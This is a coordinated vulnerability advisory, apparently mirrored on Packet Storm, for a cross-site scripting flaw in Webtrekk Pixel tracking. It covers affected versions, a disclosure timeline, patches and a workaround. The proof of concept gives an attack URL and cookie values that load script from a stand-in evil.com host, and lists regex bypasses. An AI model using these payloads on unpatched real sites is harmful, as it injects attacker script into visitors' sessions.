Twenty Year Anniversary

Webtrekk Pixel Tracking Cross Site Scripting

Webtrekk Pixel Tracking Cross Site Scripting
Posted Oct 17, 2017
Authored by Malte Batram | Site sec-consult.com

Webtrekk Pixel Track versions 3.24 to 3.40, 4.00 to 4.40, and 5.00 to 5.04 suffer from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | b3b27563cb47af66f17f10561156cccc

Webtrekk Pixel Tracking Cross Site Scripting

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20171017-0 >
=======================================================================
title: Cross site scripting
product: Webtrekk Pixel tracking
vulnerable version: v3.24 to v3.40, v4.00 to v4.40, v5.00 to v5.04
fixed version: v3.41, v4.41, v5.05
impact: Medium
homepage: https://www.webtrekk.com/
found: 2017-08-29
by: Malte Batram for
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Webtrekk Analytics offers an endless range of filter and analysis functions.
Whatever type of site you operate, our analytics tools give you the raw data
you need to dive into your web and app metrics so you can optimise your
digital marketing campaigns."

Source: https://www.webtrekk.com/en/solutions/analytics/

"At home in Germany, Webtrekk ranks first among professional analytics tools
used by the 1,000 most popular .de domains. All told, Webtrekk has a
22.9 percent market share among providers for the top German domains,
excluding sites that use Google Analytics or have no analytics system."

Source: https://www.webtrekk.com/en/why-webtrekk/market-leader/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Cross site scripting vulnerability
The Webtrekk Pixel component, used on many websites to track users, has the
capability to load arbitrary external JavaScript via multiple parameter
combinations. The parameters are parsed from the search-part of the URL.

?wt_overlay=1&wt_reporter=url_for_external_javascript
?wt_heatmap=1&wt_reporter=url_for_external_javascript

The URL specified in the parameter wt_reporter is checked by a Regex that can
be bypassed in different ways.


Proof of concept:
-----------------
1) Cross site scripting vulnerability
Example URL:
http://www.example.com/?wt_overlay=1&wt_reporter=report1.webtrekk.com.evil.com/

The example URL leads to the inclusion of the following HTML in the page:
<script language="javascript" type="text/javascript"
src="https://report1.webtrekk.com.evil.com/overlay.pl?
wt_contentId=..."></script>

Regex that checks the URL:
/^(http[s]?:\/\/)?(report\d+|analytics)\.webtrekk\.(com|de).*$/

The .* at the end of the expression allows multiple bypasses:
Subdomain: report1.webtrekk.com.evil.com/
Auth: report1.webtrekk.com@evil.com/
NoSlash: report1.webtrekk.com

The last bypass leads to the inclusion of JavaScript from the domain
overlay.pl, which at the time of testing was open to be registered, but has been
registered by Webtrekk for security reasons now.

The vulnerability can also be triggered via cookies. This enables an attacker
to execute JavaScript in the session of the victim anytime the website with
the vulnerable script is visited, after only using the parameters from the
search once to set the cookie values.

Cookie values:
wt_overlay=1; wt_overlayFrame=report1.webtrekk.com.evil.com/;


Vulnerable / tested versions:
-----------------------------
Latest version v4.3.9 tested:
https://support.webtrekk.com/hc/de/article_attachments/115005882469/Webtrekk_EN_Config_Pixel_v4.3.9.zip

Also found to be vulnerable: 3.2.6, 4.0.5, 4.3.5

The setup for version 5 is different and the static part (tiLoader.min.js)
does not include the vulnerable JavaScript directly. However code similiar to
the overlay functions from version 3 and 4 seems to be loaded dynamically (which
also includes the same Regex check).

According to the vendor, v5 is affected as well.


Vendor contact timeline:
------------------------
2017-08-30: Contacting vendor through ask@webtrekk.com & email under "Contact",
no answer
2017-09-12: Asking for contact again
2017-09-12: Vendor: requests sending the advisory and verifies it internally
2017-09-13: Vendor: optimized validation, fixed in internal version
2017-09-14: Release of patched version and vendor informs their customers
2017-10-17: Coordinated release of security advisory


Solution:
---------
Upgrade to the patched versions from the vendor immediately. The following
versions contain better domain validation and fix the issue according to
the vendor:

v3.41, v4.41, v5.05

According to the vendor, the updated versions are available within the
support center on the vendor's website for all customers and a message that
a security update is available will be shown.


Workaround:
-----------
Setting "disableOverlayView: true" in the webtrekkConfig prevents the execution
of the vulnerable code.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/about-us/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Batram / @2017

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    7 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    40 Files
  • 23
    May 23rd
    64 Files
  • 24
    May 24th
    55 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close